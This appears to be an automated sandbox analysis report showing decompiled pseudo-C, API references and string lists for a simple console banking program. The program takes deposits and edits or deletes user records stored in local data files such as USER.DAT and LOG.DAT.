                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                                • API String ID: 532294799-930819241
                                                • Opcode ID: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction ID: f0d91d520195e11ca8cb4939e558e55eddc5d4bdbc70a094af231fb1ae6ee06c
                                                • Opcode Fuzzy Hash: 36d9b47078b892e7da5ba9ef6553782b70b2e977129376ef7b9a9ee83f7656da
                                                • Instruction Fuzzy Hash: 1C91B7F2D3030ABBDB15FBA09C82EEE77785FA5700F004259F90575180FA7166988BB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E01232B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char _v19;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v48;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v71;
                                                				char _v75;
                                                				char _v79;
                                                				char _v80;
                                                				char _v83;
                                                				char _v87;
                                                				char _v91;
                                                				char _v95;
                                                				char _v99;
                                                				char _v103;
                                                				char _v107;
                                                				char _v111;
                                                				char _v112;
                                                				char _v144;
                                                				char _v176;
                                                				char _v208;
                                                				void* __ebp;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				void* _t68;
                                                				intOrPtr _t84;
                                                				intOrPtr _t86;
                                                				intOrPtr _t87;
                                                				void* _t88;
                                                				intOrPtr _t89;
                                                				intOrPtr _t95;
                                                				intOrPtr _t98;
                                                				intOrPtr _t105;
                                                				char _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                				intOrPtr _t119;
                                                				intOrPtr _t130;
                                                				intOrPtr _t132;
                                                				void* _t136;
                                                				void* _t140;
                                                				void* _t141;
                                                				void* _t142;
                                                				void* _t143;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t154;
                                                
                                                				_t161 = __fp0;
                                                				_t135 = __esi;
                                                				_t134 = __edi;
                                                				_t113 = __ebx;
                                                				_v48 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v19 = 0;
                                                				_v112 = 0;
                                                				_v111 = 0;
                                                				_v107 = 0;
                                                				_v103 = 0;
                                                				_v99 = 0;
                                                				_v95 = 0;
                                                				_v91 = 0;
                                                				_v87 = 0;
                                                				_v83 = 0;
                                                				_v80 = 0;
                                                				_v79 = 0;
                                                				_v75 = 0;
                                                				_v71 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v16 = 0;
                                                				_v12 = 0;
                                                				E012320E0(0, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t134, _t135,  &_v112);
                                                				_t66 = E01236EF1("USER.DAT", "r");
                                                				_t140 = _t136 + 0x18;
                                                				 *0x1252f28 = _t66;
                                                				while(1) {
                                                					_push( &_v144);
                                                					_push( &_v176);
                                                					_t67 =  *0x1252f28; // 0x0
                                                					_t68 = E01237021(_t67, "%s %s %s\n", 0x1252ee0);
                                                					_t141 = _t140 + 0x14;
                                                					if(_t68 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t109 = E01238230(0x1252ee4,  &_v176);
                                                					_t140 = _t141 + 8;
                                                					if(_t109 == 0) {
                                                						_t110 = E01238230(0x1252f02,  &_v144);
                                                						_t140 = _t140 + 8;
                                                						if(_t110 == 0) {
                                                							_v16 = _v16 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t116 =  *0x1252f28; // 0x0
                                                				_push(_t116);
                                                				E01236DB6(_t113, _t134, _t135, __eflags);
                                                				_t142 = _t141 + 4;
                                                				E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                				__eflags = _v16;
                                                				if(__eflags != 0) {
                                                					E012312B0(8, 0xa);
                                                					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
                                                					E0123715C(_t113, _t134, _t135, __eflags);
                                                					_t143 = _t142 + 4;
                                                					__eflags = _v5 - 0x59;
                                                					if(__eflags == 0) {
                                                						do {
                                                							L10:
                                                							E012320E0(_t116, _t134, _t135, __eflags, _t161);
                                                							_v12 = 0;
                                                							E012312B0(0x19, 8);
                                                							_push("NEW User Name        : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E0123738B("%s",  &_v208);
                                                							E012312B0(0x19, 0xa);
                                                							_push("NEW Password         : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v48);
                                                							E012312B0(0x19, 0xc);
                                                							_push("Confirm NEW Password : ");
                                                							E0123715C(_t113, _t134, _t135, __eflags);
                                                							E012312F0(_t134, _t135,  &_v80);
                                                							_t116 =  &_v80;
                                                							_t84 = E01238230( &_v48,  &_v80);
                                                							_t143 = _t143 + 0x1c;
                                                							__eflags = _t84;
                                                							if(__eflags != 0) {
                                                								E012320E0( &_v80, _t134, _t135, __eflags, _t161);
                                                								E012312B0(0xa, 0xa);
                                                								_push(0x124f710);
                                                								E0123715C(_t113, _t134, _t135, __eflags);
                                                								_t143 = _t143 + 4;
                                                								_t105 = _v12 + 1;
                                                								__eflags = _t105;
                                                								_v12 = _t105;
                                                							}
                                                							__eflags = _v12;
                                                						} while (__eflags != 0);
                                                						 *0x1252f28 = E01236EF1("USER.DAT", 0x124f740);
                                                						_t86 = E01236EF1("temp.dat", "a");
                                                						_t149 = _t143 + 0x10;
                                                						 *0x1252f20 = _t86;
                                                						while(1) {
                                                							_push( &_v144);
                                                							_push( &_v176);
                                                							_t87 =  *0x1252f28; // 0x0
                                                							_t88 = E01237021(_t87, "%s %s %s\n", 0x1252ee0);
                                                							_t150 = _t149 + 0x14;
                                                							__eflags = _t88 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t95 = E01238230(0x1252ee4,  &_v176);
                                                							_t154 = _t150 + 8;
                                                							__eflags = _t95;
                                                							if(__eflags != 0) {
                                                								L17:
                                                								_push( &_v144);
                                                								_push( &_v176);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t130 =  *0x1252f20; // 0x0
                                                								_push(_t130);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								L19:
                                                								continue;
                                                							}
                                                							_t98 = E01238230(0x1252f02,  &_v144);
                                                							_t154 = _t154 + 8;
                                                							__eflags = _t98;
                                                							if(__eflags == 0) {
                                                								_push( &_v48);
                                                								_push( &_v208);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t132 =  *0x1252f20; // 0x0
                                                								_push(_t132);
                                                								E01236F06(_t113, _t134, _t135, __eflags);
                                                								_t149 = _t154 + 0x14;
                                                								goto L19;
                                                							}
                                                							goto L17;
                                                						}
                                                						_t89 =  *0x1252f28; // 0x0
                                                						_push(_t89);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						_t119 =  *0x1252f20; // 0x0
                                                						_push(_t119);
                                                						E01236DB6(_t113, _t134, _t135, __eflags);
                                                						E012320E0(_t119, _t134, _t135, __eflags, _t161);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record has been EDITED successfully!");
                                                						return E0123715C(_t113, _t134, _t135, __eflags);
                                                					}
                                                					_t106 = _v5;
                                                					__eflags = _t106 - 0x79;
                                                					if(__eflags != 0) {
                                                						return _t106;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f640);
                                                				return E0123715C(_t113, _t134, _t135, __eflags);
                                                			}






























































                                                0x01232b10
                                                0x01232b10
                                                0x01232b10
                                                0x01232b10
                                                0x01232b19
                                                0x01232b1f
                                                0x01232b22
                                                0x01232b25
                                                0x01232b28
                                                0x01232b2b
                                                0x01232b2e
                                                0x01232b31
                                                0x01232b34
                                                0x01232b37
                                                0x01232b3d
                                                0x01232b40
                                                0x01232b43
                                                0x01232b46
                                                0x01232b49
                                                0x01232b4c
                                                0x01232b4f
                                                0x01232b52
                                                0x01232b55
                                                0x01232b5b
                                                0x01232b5e
                                                0x01232b61
                                                0x01232b64
                                                0x01232b67
                                                0x01232b6a
                                                0x01232b6d
                                                0x01232b70
                                                0x01232b73
                                                0x01232b7a
                                                0x01232b81
                                                0x01232b8a
                                                0x01232b8f
                                                0x01232b94
                                                0x01232ba6
                                                0x01232bb2
                                                0x01232bb7
                                                0x01232bbc
                                                0x01232bc8
                                                0x01232bd7
                                                0x01232bdc
                                                0x01232bdf
                                                0x01232be4
                                                0x01232bea
                                                0x01232bf1
                                                0x01232bfc
                                                0x01232c02
                                                0x01232c07
                                                0x01232c0d
                                                0x00000000
                                                0x00000000
                                                0x01232c1b
                                                0x01232c20
                                                0x01232c25
                                                0x01232c33
                                                0x01232c38
                                                0x01232c3d
                                                0x01232c45
                                                0x01232c45
                                                0x01232c3d
                                                0x01232c48
                                                0x01232c4a
                                                0x01232c50
                                                0x01232c51
                                                0x01232c56
                                                0x01232c59
                                                0x01232c5e
                                                0x01232c62
                                                0x01232c83
                                                0x01232c88
                                                0x01232c8d
                                                0x01232c92
                                                0x01232c99
                                                0x01232c9c
                                                0x01232cab
                                                0x01232cab
                                                0x01232cab
                                                0x01232cb0
                                                0x01232cbb
                                                0x01232cc0
                                                0x01232cc5
                                                0x01232cd9
                                                0x01232ce5
                                                0x01232cea
                                                0x01232cef
                                                0x01232cfb
                                                0x01232d04
                                                0x01232d09
                                                0x01232d0e
                                                0x01232d1a
                                                0x01232d1f
                                                0x01232d27
                                                0x01232d2c
                                                0x01232d2f
                                                0x01232d31
                                                0x01232d33
                                                0x01232d3c
                                                0x01232d41
                                                0x01232d46
                                                0x01232d4b
                                                0x01232d51
                                                0x01232d51
                                                0x01232d54
                                                0x01232d54
                                                0x01232d57
                                                0x01232d57
                                                0x01232d73
                                                0x01232d82
                                                0x01232d87
                                                0x01232d8a
                                                0x01232d8f
                                                0x01232d95
                                                0x01232d9c
                                                0x01232da7
                                                0x01232dad
                                                0x01232db2
                                                0x01232db5
                                                0x01232db8
                                                0x00000000
                                                0x00000000
                                                0x01232dca
                                                0x01232dcf
                                                0x01232dd2
                                                0x01232dd4
                                                0x01232dee
                                                0x01232df4
                                                0x01232dfb
                                                0x01232dfc
                                                0x01232e01
                                                0x01232e06
                                                0x01232e0c
                                                0x01232e0d
                                                0x01232e12
                                                0x01232e3b
                                                0x00000000
                                                0x01232e3b
                                                0x01232de2
                                                0x01232de7
                                                0x01232dea
                                                0x01232dec
                                                0x01232e1a
                                                0x01232e21
                                                0x01232e22
                                                0x01232e27
                                                0x01232e2c
                                                0x01232e32
                                                0x01232e33
                                                0x01232e38
                                                0x00000000
                                                0x01232e38
                                                0x00000000
                                                0x01232dec
                                                0x01232e40
                                                0x01232e45
                                                0x01232e46
                                                0x01232e4e
                                                0x01232e54
                                                0x01232e55
                                                0x01232e5d
                                                0x01232e66
                                                0x01232e6b
                                                0x00000000
                                                0x01232e75
                                                0x01232c9e
                                                0x01232ca2
                                                0x01232ca5
                                                0x01232e7b
                                                0x01232e7b
                                                0x00000000
                                                0x01232ca5
                                                0x01232c68
                                                0x01232c6d
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232B94
                                                • _wscanf.LIBCMT ref: 01232BA6
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232BBC
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01232C02
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232C72
                                                • _wprintf.LIBCMT ref: 01232C8D
                                                • _wprintf.LIBCMT ref: 01232CC5
                                                • _wscanf.LIBCMT ref: 01232CD9
                                                • _wprintf.LIBCMT ref: 01232CEF
                                                • _wprintf.LIBCMT ref: 01232D0E
                                                • _wprintf.LIBCMT ref: 01232D46
                                                • _swscanf.LIBCMT ref: 01232DAD
                                                • _fprintf.LIBCMT ref: 01232E0D
                                                • _fprintf.LIBCMT ref: 01232E33
                                                • _wprintf.LIBCMT ref: 01232E70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                                • API String ID: 1431756120-371646773
                                                • Opcode ID: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction ID: fcc9a805462d712e36d20f9da7b5c517cc61060683e2cd0e342f5b7ae423bcdf
                                                • Opcode Fuzzy Hash: d396c3ed00661b2f4ae72a74369d26af51d90cfbdae015bbb73c10797e6c65de
                                                • Instruction Fuzzy Hash: C181A7F1D70306EFEF15EBE9DD42FAD76746BB5700F008169E505B6280E670A2188B76
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E01232800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				char _v20;
                                                				char _v23;
                                                				char _v27;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v52;
                                                				char _v84;
                                                				char _v116;
                                                				char _v129;
                                                				char _v139;
                                                				char _v154;
                                                				char _v188;
                                                				void* __ebp;
                                                				intOrPtr _t47;
                                                				void* _t49;
                                                				char _t54;
                                                				intOrPtr _t56;
                                                				void* _t58;
                                                				intOrPtr _t62;
                                                				void* _t65;
                                                				intOrPtr _t67;
                                                				intOrPtr _t75;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				intOrPtr _t83;
                                                				void* _t86;
                                                				void* _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                				intOrPtr _t96;
                                                				intOrPtr _t99;
                                                				intOrPtr _t105;
                                                				intOrPtr _t107;
                                                				intOrPtr _t109;
                                                				void* _t118;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t124;
                                                				void* _t125;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t132;
                                                				void* _t133;
                                                				void* _t139;
                                                
                                                				_t146 = __fp0;
                                                				_t117 = __esi;
                                                				_t116 = __edi;
                                                				_t89 = __ebx;
                                                				_v52 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v27 = 0;
                                                				_v23 = 0;
                                                				_v12 = 0;
                                                				E012320E0(__ecx, __edi, __esi, 0, __fp0);
                                                				E012312B0(0x19, 8);
                                                				_push("User Name  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E0123738B("%s", 0x1252ee4);
                                                				E012312B0(0x19, 0xa);
                                                				_push("Password  : ");
                                                				E0123715C(__ebx, __edi, __esi, 0);
                                                				E012312F0(_t116, _t117,  &_v52);
                                                				_t47 = E01236EF1("USER.DAT", "r");
                                                				_t122 = _t118 + 0x18;
                                                				 *0x1252f28 = _t47;
                                                				while(1) {
                                                					_push( &_v116);
                                                					_push( &_v84);
                                                					_t92 =  *0x1252f28; // 0x0
                                                					_t49 = E01237021(_t92, "%s %s %s\n", 0x1252ee0);
                                                					_t123 = _t122 + 0x14;
                                                					if(_t49 == 0xffffffff) {
                                                						break;
                                                					}
                                                					_t86 = E01238230(0x1252ee4,  &_v84);
                                                					_t122 = _t123 + 8;
                                                					if(_t86 == 0) {
                                                						_t88 = E01238230(0x1252f02,  &_v116);
                                                						_t122 = _t122 + 8;
                                                						if(_t88 == 0) {
                                                							_v12 = _v12 + 1;
                                                						}
                                                					}
                                                				}
                                                				_t105 =  *0x1252f28; // 0x0
                                                				_push(_t105);
                                                				E01236DB6(_t89, _t116, _t117, __eflags);
                                                				_t124 = _t123 + 4;
                                                				E012320E0(_t92, _t116, _t117, __eflags, _t146);
                                                				__eflags = _v12;
                                                				if(__eflags != 0) {
                                                					E012312B0(0xf, 0xa);
                                                					_push("Are you sure you want to DELETE this user? <Y/N> : ");
                                                					E0123715C(_t89, _t116, _t117, __eflags);
                                                					_t125 = _t124 + 4;
                                                					_t54 = _v5;
                                                					__eflags = _t54 - 0x59;
                                                					if(_t54 == 0x59) {
                                                						L10:
                                                						 *0x1252f28 = E01236EF1("USER.DAT", "r");
                                                						_t56 = E01236EF1("temp.dat", "a");
                                                						_t127 = _t125 + 0x10;
                                                						 *0x1252f20 = _t56;
                                                						while(1) {
                                                							_push( &_v116);
                                                							_push( &_v84);
                                                							_t93 =  *0x1252f28; // 0x0
                                                							_t58 = E01237021(_t93, "%s %s %s\n", 0x1252ee0);
                                                							_t128 = _t127 + 0x14;
                                                							__eflags = _t58 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							_t79 = E01238230(0x1252ee4,  &_v84);
                                                							_t139 = _t128 + 8;
                                                							__eflags = _t79;
                                                							if(__eflags != 0) {
                                                								L14:
                                                								_push( &_v116);
                                                								_push( &_v84);
                                                								_push(0x1252ee0);
                                                								_push("%s %s %s\n");
                                                								_t80 =  *0x1252f20; // 0x0
                                                								_push(_t80);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t127 = _t139 + 0x14;
                                                								L15:
                                                								continue;
                                                							}
                                                							_t83 = E01238230(0x1252f02,  &_v116);
                                                							_t127 = _t139 + 8;
                                                							__eflags = _t83;
                                                							if(__eflags == 0) {
                                                								goto L15;
                                                							}
                                                							goto L14;
                                                						}
                                                						_t94 =  *0x1252f28; // 0x0
                                                						_push(_t94);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t107 =  *0x1252f20; // 0x0
                                                						_push(_t107);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						 *0x1252f28 = E01236EF1("LOG.DAT", "r");
                                                						_t62 = E01236EF1("temp.dat", "w");
                                                						_t132 = _t128 + 0x18;
                                                						 *0x1252f20 = _t62;
                                                						while(1) {
                                                							_push( &_v129);
                                                							_push( &_v139);
                                                							_push( &_v154);
                                                							_t96 =  *0x1252f28; // 0x0
                                                							_t65 = E01237021(_t96, "%s %s %s %s",  &_v188);
                                                							_t133 = _t132 + 0x18;
                                                							__eflags = _t65 - 0xffffffff;
                                                							if(__eflags == 0) {
                                                								break;
                                                							}
                                                							E01247CF2( &_v188);
                                                							E01247CF2( &_v20);
                                                							_t75 = E01238230( &_v188,  &_v20);
                                                							_t132 = _t133 + 0x10;
                                                							__eflags = _t75;
                                                							if(__eflags != 0) {
                                                								_push( &_v129);
                                                								_push( &_v139);
                                                								_push( &_v154);
                                                								_push( &_v188);
                                                								_push("%s %s %s %s\n");
                                                								_t99 =  *0x1252f20; // 0x0
                                                								_push(_t99);
                                                								E01236F06(_t89, _t116, _t117, __eflags);
                                                								_t132 = _t132 + 0x18;
                                                							}
                                                						}
                                                						_t109 =  *0x1252f28; // 0x0
                                                						_push(_t109);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						_t67 =  *0x1252f20; // 0x0
                                                						_push(_t67);
                                                						E01236DB6(_t89, _t116, _t117, __eflags);
                                                						E012320E0(_t96, _t116, _t117, __eflags, _t146);
                                                						E012312B0(0x19, 0xa);
                                                						_push("Record DELETED successfully!");
                                                						return E0123715C(_t89, _t116, _t117, __eflags);
                                                					}
                                                					__eflags = _v5 - 0x79;
                                                					if(_v5 != 0x79) {
                                                						return _t54;
                                                					}
                                                					goto L10;
                                                				}
                                                				E012312B0(0xa, 0xa);
                                                				_push(0x124f4fc);
                                                				return E0123715C(_t89, _t116, _t117, __eflags);
                                                			}






















































                                                0x01232800
                                                0x01232800
                                                0x01232800
                                                0x01232800
                                                0x01232809
                                                0x0123280f
                                                0x01232812
                                                0x01232815
                                                0x01232818
                                                0x0123281b
                                                0x0123281e
                                                0x01232821
                                                0x01232824
                                                0x01232827
                                                0x0123282e
                                                0x01232837
                                                0x0123283c
                                                0x01232841
                                                0x01232853
                                                0x0123285f
                                                0x01232864
                                                0x01232869
                                                0x01232875
                                                0x01232884
                                                0x01232889
                                                0x0123288c
                                                0x01232891
                                                0x01232894
                                                0x01232898
                                                0x012328a3
                                                0x012328aa
                                                0x012328af
                                                0x012328b5
                                                0x00000000
                                                0x00000000
                                                0x012328c0
                                                0x012328c5
                                                0x012328ca
                                                0x012328d5
                                                0x012328da
                                                0x012328df
                                                0x012328e7
                                                0x012328e7
                                                0x012328df
                                                0x012328ea
                                                0x012328ec
                                                0x012328f2
                                                0x012328f3
                                                0x012328f8
                                                0x012328fb
                                                0x01232900
                                                0x01232904
                                                0x01232925
                                                0x0123292a
                                                0x0123292f
                                                0x01232934
                                                0x01232937
                                                0x0123293b
                                                0x0123293e
                                                0x0123294d
                                                0x0123295f
                                                0x0123296e
                                                0x01232973
                                                0x01232976
                                                0x0123297b
                                                0x0123297e
                                                0x01232982
                                                0x0123298d
                                                0x01232994
                                                0x01232999
                                                0x0123299c
                                                0x0123299f
                                                0x00000000
                                                0x00000000
                                                0x012329aa
                                                0x012329af
                                                0x012329b2
                                                0x012329b4
                                                0x012329cb
                                                0x012329ce
                                                0x012329d2
                                                0x012329d3
                                                0x012329d8
                                                0x012329dd
                                                0x012329e2
                                                0x012329e3
                                                0x012329e8
                                                0x012329eb
                                                0x00000000
                                                0x012329eb
                                                0x012329bf
                                                0x012329c4
                                                0x012329c7
                                                0x012329c9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x012329c9
                                                0x012329ed
                                                0x012329f3
                                                0x012329f4
                                                0x012329fc
                                                0x01232a02
                                                0x01232a03
                                                0x01232a1d
                                                0x01232a2c
                                                0x01232a31
                                                0x01232a34
                                                0x01232a39
                                                0x01232a3c
                                                0x01232a43
                                                0x01232a4a
                                                0x01232a57
                                                0x01232a5e
                                                0x01232a63
                                                0x01232a66
                                                0x01232a69
                                                0x00000000
                                                0x00000000
                                                0x01232a72
                                                0x01232a7e
                                                0x01232a91
                                                0x01232a96
                                                0x01232a99
                                                0x01232a9b
                                                0x01232aa0
                                                0x01232aa7
                                                0x01232aae
                                                0x01232ab5
                                                0x01232ab6
                                                0x01232abb
                                                0x01232ac1
                                                0x01232ac2
                                                0x01232ac7
                                                0x01232ac7
                                                0x01232aca
                                                0x01232acf
                                                0x01232ad5
                                                0x01232ad6
                                                0x01232ade
                                                0x01232ae3
                                                0x01232ae4
                                                0x01232aec
                                                0x01232af5
                                                0x01232afa
                                                0x00000000
                                                0x01232b04
                                                0x01232944
                                                0x01232947
                                                0x01232b0a
                                                0x01232b0a
                                                0x00000000
                                                0x01232947
                                                0x0123290a
                                                0x0123290f
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232841
                                                • _wscanf.LIBCMT ref: 01232853
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232869
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 012328AA
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _wprintf.LIBCMT ref: 01232914
                                                • _wprintf.LIBCMT ref: 0123292F
                                                • _swscanf.LIBCMT ref: 01232994
                                                • _fprintf.LIBCMT ref: 012329E3
                                                • _swscanf.LIBCMT ref: 01232A5E
                                                • _fprintf.LIBCMT ref: 01232AC2
                                                • _wprintf.LIBCMT ref: 01232AFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                                • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                                • API String ID: 3163849712-4002591224
                                                • Opcode ID: 8f68f0044d92cee46a3857197f934cba047f56bb2c8d8ece20c0c8ecc6e3979f
                                                • Instruction ID: 076d58e85ca01c1a6b5067cfb64ac55c1ffb54fb449b3a7240fb921a9c9eedcb
